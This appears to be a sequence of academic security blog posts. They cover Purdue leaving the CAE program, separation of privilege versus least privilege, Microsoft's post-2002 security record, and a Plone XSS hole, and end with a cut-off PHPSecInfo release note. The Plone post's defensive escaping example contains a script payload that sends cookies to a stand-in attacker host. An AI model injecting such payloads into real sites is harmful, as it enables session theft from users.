History
Back in 1997, the year before CERIAS was formally established, I testified before Congress on the state of cyber security in academia. In my testimony, I pointed out that there were only four established research groups, and that their combined PhD production was around 3 per year, not counting cryptography.
Also in that testimony, I outlined that support was needed for new centers of expertise, and better support of existing centers.
As a result of that testimony, I was asked to participate in some discussions with staff from OSTP, from some Congressional committees (notably, the House Science Committee), and Richard Clarke's staff in the Executive Office of the President. I was also invited to some conversations with leadership at the NSA, including the deputy director for information systems security (IAD), Mike Jacobs. Those discussions were about how to increase the profile of the area, and get more people educated in information security.
Among the ideas I discussed were ones expanded from my testimony. They eventually morphed into the Scholarship for Service program, the NSF CyberTrust program, and the NSA Centers of Academic Excellence (CAE). [NB. I am not going to claim sole or primary credit for these programs. I know I came up with the ideas, briefed people about them, discussed pros & cons, and then those groups took them and turned them into what we got. None of them are quite what I proposed, but that is how things happen in DC.]
The CAE program was established by the NSA in late 1998. The CAE certification was built around courses meeting CNSS requirements. Purdue was one of the first seven universities certified as CAEs, in May of 1999. We remained in the CAE program until earlier this year (2008). In 2003, DHS became a co-sponsor of the program.
Why Purdue is No Longer a CAE
In 2007, we were informed that unless we renewed our CNSS certifications by the end of August, we would not be eligible for CAE renewal in 2008. This prompted discussion and reflection by faculty and staff at CERIAS. As noted above, the mapping of CNSS requirements to our classes is non-trivial. The CAE application was also non-trivial. None of our personnel were willing to devote the hours of effort required to do the processing. Admittedly, we could have "faked" some of the mapping (as we know some schools have done in the past), but that was never an option for us. We had other objections, too (see what follows). As a result, we did not renew the certifications, and we dropped out of the CAE program when our certification expired earlier this year.
Our decision was not made lightly -- we nearly dropped out in 2004 when we last renewed (and were not grandfathered into the new 5 year renewal cycle, much to our annoyance), and there was continuing thought given to this over intervening years. We identified a number of issues with the program, and the overhead of the mapping and application process was not the only (or principal) issue.
First, and foremost, we do not believe it is possible to have 94 (most recent count) Centers of Excellence in this field. After the coming year, we would not be surprised if the number grew to over 100, and that is beyond silly. There may be at most a dozen centers of real excellence, and pretending that the ability to offer some courses and stock a small library collection means "excellence" isn't candid.
The program at this size is actually a Centers of Adequacy program. That isn't intended to be pejorative -- it is simply a statement about the size of the program and the nature of the requirements.
Some observers and colleagues outside the field have looked at the list of schools and noted that there is a huge disparity among the capabilities, student quality, resources, and faculties of some of those schools. Thus, they have concluded that if those schools are all equally "excellent" in cyber security, then the good ones can't be very good ("excellent" is supposed to denote the best, after all). We have actually had pundits conclude from this that cyber security & privacy studies can't be much of a discipline. That is a disservice to the field as a whole.
Instead of actually designating excellence, the CAE program has become an ersatz certification program. The qualifications to be met are for minimums, not for excellence. In a field with so few real experts and so little money for advanced efforts, this is understandable given one of the primary goals of the CAE program -- to encourage schools to offer IA/IS programs. Thus, the program sets a relatively low bar and many schools have put in efforts and resources to meet those requirements. This is a good thing, because it has helped raise the awareness of the field. However, it currently doesn't set a high enough bar to improve the field, nor does it offer the resources to do so.
Setting a low bar also means that academic program requirements are being heavily influenced by a government agency rather than the academic community itself. This is not good for the field because it means the requirements are being set based on particular application need (of the government) rather than the academic community's understanding of foundations, history, guiding principles, and interaction with other fields. (E.g., Would your mathematics department base its courses on what is required to produce IRS auditors? We think not!) In practice, the CAE program has probably helped suppress what otherwise would be a trend by our community to discuss a formal, common curriculum standard. In this sense, participation in the CAE program may now be holding us back.
Second, and related, the CNSS standards are really training standards, and not educational standards. Some of them might be met by a multi-day class taught by a commercial service such as SANS or CSI -- what does that say about university-level classes we map to them? The original CNSS intent was to provide guidance for the production of trained system operators -- rather than the designers, researchers, thinkers, managers, investigators and more that some of our programs (and Purdue's, in particular) are producing.
We have found the CNSS standards to be time-consuming to map to courses, and in many cases ill-suited to university-level coursework, and therefore inappropriate for our students. Tellingly, in 9 years we have never had a single one of our grads ask us for proof that they met the CNSS standards because an employer cared! We don't currently intend to offer courses structured around any of the CNSS standards, and it is past the point where we are interested in supporting the fiction that they are central to a real curriculum.
Third, we have been told repeatedly over the years that there might be resources made available for CAE schools if only we participated. It has never happened. The Scholarship for Service program is open to non-CAE schools (read the NSF program solicitation carefully), so don't think of that as an example. With 100 schools, what resources could reasonably be expected? If the NSA or DHS got an extra $5 million, and they spread it evenly, each would get $50,000. Take out institutional overhead charges, and that might be enough for 1 student scholarship...if that. If there were 10 schools, then $500,000 each is an amount that might begin to make a difference. But over a span of nearly 10 years the amount provided has been zero, and any way you divide that, it doesn't really help any of us. Thus, we have been investing time and energy in a program that has not brought us resources to improve. Some investment of our energy & time to bolster community was warranted, but that time is past.
Fourth, the renewal process is a burden because of the nature of university staffing and the time required. With no return on getting the designation, we could not find anyone willing to invest the time for the renewal effort.
Closing Comments
In conclusion, we see the CAE effort as valuable for smaller schools, or those starting programs. By having the accreditation (which is what this is, although it doesn't meet ISO standards for such), those programs can show some minimal capabilities, and perhaps obtain local resources to enhance them. However, for major programs with broader thrusts and a higher profile, the CAE has no real value, and may even have negative connotations. (And no, the new CAE-R program does not solve this as it is currently structured.)
The CAE program is based on training standards (CNSS) that do not have strong pedagogical foundations, which is not appropriate for a leading educational program. As the field continues to evolve over the next few years, faculty at CERIAS at Purdue expect to continue to play a leading role in shaping a real academic curriculum. That cannot be done by embracing the CAE.
We are confident that people who understand the field are not going to ignore the good schools simply because they don't have the designation, any more than people have ignored major CS programs because they do not have CSAB accreditation. We've been recognized for our excellence in research, we continue to attract and graduate excellent students, and we continue to serve the community. We are certain that people will recognize that and respond accordingly.
More importantly, this goes to the heart of what it means to be "trustworthy." Security and privacy issues are based on a concept of trust, and that also implies honesty. It simply is not honest to continue to participate in (and thereby support) a designation that is misleading. There are not 94 centers of excellence in information and cyber security in the US. You might ask the personnel at some of the schools so designated why they feel the need to participate and shore up that unfortunate canard.
The above was originally written in 2008. A few years later, the CAE requirements were changed to add a CAE-R designation (R for research), and several of our students did the mapping so we were redesignated. Most of the criticisms remain accurate even in 2012.
Least privilege is the idea of giving a subject or process only the privileges it needs to complete a task. Compartmentalization is a technique for separating code into parts to which least privilege can be applied, so that if one part is compromised, the attacker does not gain full access. Why does this get confused all the time with separation of privilege?

Separation of privilege is breaking up a *single* privilege amongst multiple, independent components or people, so that agreement among several of them (or collusion) is necessary to perform an action (e.g., dual signature checks). So, if an authentication system has various biometric components, a component that evaluates a token, and another component that evaluates some knowledge or capability, and all have to agree for authentication to occur, then that is separation of privilege. It is essentially a logical "AND" operation; in its simplest form, a system would check several conditions before granting approval for an operation. Bishop uses the example of "su" or "sudo": a user (or attacker of a compromised process) needs to know the appropriate password, and the user needs to be in a special group.

A related, but not identical, concept is that of majority voting systems. Redundant systems have to agree, hopefully outvoting a defective system. If there were no voting, i.e., if all of the systems always had to agree, it would be separation of privilege. OpenSSH's UsePrivilegeSeparation option is *not* an implementation of privilege separation by that definition; it simply runs compartmentalized code using least privilege on each compartment.
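To make the distinction concrete, here is a minimal sketch in Python. All of the names, helpers, and data are invented for illustration (this is not the code of sudo, OpenSSH, or any real system); it simply shows separation of privilege as a logical AND of independent checks:

    # Separation of privilege: an action is allowed only if several
    # *independent* checks all agree, so defeating any single check
    # (or any single person) is not enough. Illustrative names only.
    import hashlib
    import hmac

    # Pretend credential store, group table, and token list.
    _PASSWORD_HASHES = {"alice": hashlib.sha256(b"correct horse").hexdigest()}
    _ADMIN_GROUP = {"alice"}
    _VALID_TOKENS = {"hardware-token-1234"}

    def knows_password(user: str, password: str) -> bool:
        """Independent check #1: something the user knows."""
        expected = _PASSWORD_HASHES.get(user, "")
        supplied = hashlib.sha256(password.encode()).hexdigest()
        return hmac.compare_digest(expected, supplied)

    def in_admin_group(user: str) -> bool:
        """Independent check #2: membership an administrator granted (cf. su/sudo)."""
        return user in _ADMIN_GROUP

    def presents_valid_token(token: str) -> bool:
        """Independent check #3: something the user possesses."""
        return token in _VALID_TOKENS

    def may_escalate(user: str, password: str, token: str) -> bool:
        # The action is permitted only if ALL of the independent checks
        # agree -- a logical AND, not a majority vote.
        return (knows_password(user, password)
                and in_admin_group(user)
                and presents_valid_token(token))

    if __name__ == "__main__":
        print(may_escalate("alice", "correct horse", "hardware-token-1234"))  # True
        print(may_escalate("alice", "correct horse", "stolen-guess"))         # False

A majority-voting variant would replace the AND with a threshold count of passing checks, which is exactly the weaker redundancy arrangement described above.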
Update: additions made 4/19 and 4/24, at the end of the post.
Back in 2002, Microsoft performed a “security standdown” that Bill Gates publicly stated cost the company over $100 million. That extreme measure was taken because of numerous security flaws popping up in Microsoft products, steadily chipping away at MS’s reputation, customer safety, and internal resources. (I was told by one MS staffer that response to major security flaws often cost close to $1 million each for staff time, product changes, customer response, etc. I don’t know if that is true, but the reality certainly was/is a substantial number.)
Without a doubt, people inside Microsoft took the issue seriously. They put all their personnel through a security course, invested heavily in new testing technologies, and even went so far as to convene an advisory board of outside experts (the TCAAB)—including some who have not always been favorably disposed towards MS security efforts. Security of the Microsoft code base suddenly became a Very Big Deal.
Fast forward 5 years: When Vista was released a few months ago, we saw lots of announcements that it was the most secure version of Windows ever, but that metric was not otherwise qualified; a cynic might comment that such an achievement would not be difficult. The user population has become habituated to the monthly release of security patches for existing products, with the occasional emergency patch. Bundling all the patches together undoubtedly helps reduce the overhead in producing them, but it also serves to obscure how many different flaws are contained inside each patch set. The number of underlying flaws may not have decreased all that much from years past.
Meanwhile, reports from inside MS indicate that there was no comprehensive testing of personnel to see how the security training worked and no follow-on training. The code base for new products has continued to grow, thus opening new possibilities for flaws and misconfiguration. The academic advisory board may still exist, but I can’t find a recent mention of it on the Microsoft web pages, and some of the people I know who were on it (myself included) were dismissed over a year ago. The external research program at MSR that connected with academic institutions doing information security research seems to have largely evaporated—the WWW page for the effort lists John Spencer as contact, and he retired from Microsoft last year. The upcoming Microsoft Research Faculty Summit has 9 research tracks, and none of them are in security.
Microsoft seems to project the attitude that they have solved the security problem.
If that’s so, why are we still seeing significant security flaws appear that affect not only their old software, but their new software written under the new, extra special security regime, such as Vista and Longhorn? The ANI flaw and the recent DNS flaw are both glaring examples of major problems that shouldn’t have been in the current code: the ANI flaw is very similar to a years-old flaw that was already known inside Microsoft, and the DNS flaw is another buffer overflow!! There are even reports that there may be dozens (or hundreds) of patches awaiting distribution for Vista.
Undoubtedly, the $100 million spent back in 2002 was worth something—the code quality has definitely improved. There is greater awareness inside Microsoft about security and privacy issues. I also know for a fact that there are a lot of bright, talented and very motivated people inside Microsoft who care about these issues. But questions remain: did Microsoft get its money’s worth? Did it invest wisely and if so, why are we still seeing so many (and so many silly) security flaws? Why does it seem that security is no longer a priority? What does that portend for Vista, Longhorn, and Office 2007? (And if you read the “standdown” article, one wonders also about Mr. Nash’s posterior.)
I have great respect for many of the things Microsoft has done, and admiration for many of the people who work there. I simply wish they had some upper management who would realize that security (and privacy) are ongoing process needs, not one-time problems to overcome with a “campaign.”
What do you think?
Update 4/19: The TCAAB does still continue to exist, apparently, but with a greater focus on privacy issues than security. I do not know who the current members might be.
Update 4/24: I have heard informally from someone inside Microsoft in response to this post. He pointed out several issues that I think are valid and deserve airing here.
Many of my questions still remain unanswered, including Mr. Nash’s condition….
Note: I’ve updated this article after getting some feedback from Alexander Limi.
A colleague of mine who is dealing with Plone, a CMS built atop Zope, pointed me to a rather disturbing document in the Plone Documentation system, one that I feel is indicative of a much larger problem in the web app dev community.
The document describes a hole (subsequently patched) in Plone that allowed users to upload arbitrary JavaScript. Apparently no input or output filtering was being done. Certainly anyone familiar with XSS attacks can see the potential for stealing cookie data, but the article seems to imply this is simply a spam issue:
Is this a security hole?
No. This is somebody logging in to your site (if you allow them to create their own users) and adding content that can redirect people to a different web site. Your server, site and content security is not compromised in any way. It’s just a slightly more sophisticated version of comment spam. If you open up your site to untrusted users, there will always be a certain risk that people add content that is not approved. It’s annoying, but it’s not a security hole.
Well, yes, actually, it is a security hole. If one can place JavaScript on your site that redirects the user to another page, they can certainly place JavaScript on your site that grabs a user’s cookie data and redirects that to another site. Whether or not they’ll get something useful from the data varies from app to app, of course. What’s worrisome is that it appears as if one of Plone’s founders (the byline on this document is for Alexander Limi, whose user page describes him as “one of Plone’s original founders.”) doesn’t seem to think this is a security issue. After getting feedback from Alexander Limi, it seems clear that he does understand the user-level security implications of the vulnerability, but was trying to make the distinction that there was no security risk to the Plone site itself. Still, the language of the document is (unintentionally) misleading, and it’s very reminiscent of the kinds of misunderstandings and excuses I see all the time in open-source web app development.
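To illustrate the kind of output filtering that was missing, here is a minimal sketch in Python. The render_comment helper and the page fragment are hypothetical (this is not Plone or Zope code); the point is simply that HTML-escaping untrusted input before writing it into a page turns injected script into inert text:

    # Output filtering sketch: escape user-supplied content before it is
    # emitted into HTML, so an injected <script> tag cannot execute.
    import html

    def render_comment(author: str, body: str) -> str:
        """Build a comment fragment from untrusted input, escaping it first."""
        safe_author = html.escape(author)
        safe_body = html.escape(body)
        return "<div class='comment'><b>{}</b>: {}</div>".format(safe_author, safe_body)

    if __name__ == "__main__":
        hostile = ("<script>document.location="
                   "'http://attacker.example/?c=' + document.cookie</script>")
        print(render_comment("mallory", hostile))
        # The <script> tag is emitted as &lt;script&gt;..., so it renders as
        # visible text in the victim's browser instead of running and
        # shipping the cookie off-site.

The same escaping (or a whitelist filter) applied when content is stored or rendered is exactly what closes this class of hole, whether the attacker's goal is spam redirection or cookie theft.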
The point here is (believe it or not) not to pick on Plone. This is a problem prevalent in most open source development (and in closed source dev, from my experience). People who simply shouldn’t be doing coding are doing the coding—and the implementation and maintenance.
Let’s be blunt: A web developer is not qualified to do the job if he or she does not have a good understanding of web application security concepts and techniques. Leaders of development teams must stop allowing developers who are weak on security techniques to contribute to their products, and managers need to stop hiring candidates who do not demonstrate a solid secure programming background. If they continue to do so, they demonstrate a lack of concern for the safety of their customers.
Educational initiatives must be stepped up to address this, both on the traditional academic level and in continuing education/training programs. Students in web development curriculums at the undergrad level need to be taught the importance of security and effective secure programming techniques. Developers in the workforce today need to have access to materials and programs that will do the same. And the managerial level needs to be brought up to speed on what to look for in the developers they hire, so that under-qualified and unqualified developers are no longer the norm on most web dev teams.
The newest version of PHPSecInfo, version 0.2, is now available. Here are the major changes:
phpinfo()
PhpSecInfo_Test_Session_Save_Path